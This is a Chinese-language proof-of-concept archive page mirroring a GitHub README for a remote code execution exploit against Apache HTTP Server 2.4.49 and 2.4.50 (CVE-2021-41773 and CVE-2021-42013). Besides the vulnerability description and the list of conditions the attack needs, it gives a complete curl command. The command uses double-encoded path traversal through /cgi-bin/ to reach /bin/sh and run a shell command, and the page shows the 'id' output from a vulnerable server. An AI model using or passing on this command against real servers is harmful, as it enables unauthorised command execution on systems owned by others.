POC详情: 0b30e7c7b4bf543c4fe05da5fa7a66e44df94b27

来源
https://github.com/mr-exo/CVE-2021-41773
关联漏洞
标题: Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞,攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。
描述
Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50
介绍
## RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):

IMHO only "special" setups will be vulnerable to this RCE.\
Same happens for the "arbitrary file read" exploits you have seen.

Both CVEs are indeed almost the same path-traversal vulnerability (2nd one is the uncomplete fix for 1st one).\
Path traversal only work from a mapped URI (e.g. via "Alias" or "ScriptAlias" Apache directives). DocumentRoot only is not sufficient.

"/cgi-bin/" is mapped by default (ScriptAlias) so that's why it's being used before the path traversal string.\
Besides, ScriptAlias marks as Exec (for Apache) all the contents for the given directory (regardless the file extensions).

### Requirements:
1/ mod_cgi enabled (not default but easy)\
2/ target binary should be +x (default for /bin/sh)\
3/ apache permissions granted for /bin or / (not default and difficult/unrealistic)\

### Check if server is vulnerable:
`curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'`

### Response from a vulnerable server:
`uid=1(daemon) gid=1(daemon) groups=1(daemon)`
文件快照

 [4.0K]  /data/pocs/0b30e7c7b4bf543c4fe05da5fa7a66e44df94b27
└── [1.1K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。